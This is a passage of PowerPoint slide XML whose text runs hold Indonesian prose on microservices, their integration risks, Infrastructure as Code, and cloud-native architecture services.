              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memengaruhi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keseluruhan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keseluruhan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mikro</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjanjikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membantu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membangun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lincah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diskalakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tangguh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beradaptasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cepat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhadap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perubahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kebutuhan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisnis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Risiko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terkait</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> model </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>besar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disebabkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>masalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>integrasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Meskipun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> masing-masing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komponen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beroperasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>baik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>independen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sering</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> kali </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengungkapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>masalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sulit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diisolasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diselesaikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>setelah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diintegrasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Microservices dan Infrastructure as Code (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>IaC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>merupakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>teknologi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>saling</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berkaitan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>arsitektur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Microservices </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sering</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> kali </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diimplementasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>praktik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>IaC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>IaC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengembang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendefinisikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>infrastruktur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memastikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konsistensi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengulangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lingkungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Hal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memungkinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>efisien</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengembangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyebaran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mikro</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karena</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengembang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mandiri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengotomatiskan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyediaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyebaran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>infrastruktur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>setiap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mikro</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Perubahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Transformasional</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Komputasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>awan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menawarkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>banyak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>arsitektur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>unik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbeda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lokal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tradisional</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cloud-native </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memungkinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meningkatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>skala</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berinovasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengoptimalkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>operasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebelumnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>arsitektur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cloud yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencakup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penawaran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komputasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>elastis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penskalaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
